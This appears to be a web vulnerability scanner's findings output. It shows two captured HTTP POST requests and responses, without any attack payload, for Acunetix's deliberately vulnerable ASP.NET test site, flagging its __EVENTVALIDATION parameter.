Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8619&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCARz7ZltsIZGRkXxDJdgeYdlBiACDBpf1Vh1iqiOY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKM39aDAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbx5HL5PbBrNqevRsysCYtcagdFVA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:01 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCARz7ZltsIZGRkXxDJdgeYdlBiACDBpf1Vh1iqiOY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKM39aDAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbx5HL5PbBrNqevRsysCYtcagdFVA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:White" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8471&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAJLmMItsIZGRkQ0hZLZN4Ok0culxvA9a%2BFmX8qlY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKMibfwBQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJEW%2BmGpqKTsNvBKmUT%2Fuh7n20%2F0c%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:02 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAJLmMItsIZGRkQ0hZLZN4Ok0culxvA9a+FmX8qlY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKMibfwBQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJEW+mGpqKTsNvBKmUT/uh7n20/0c=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:White" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
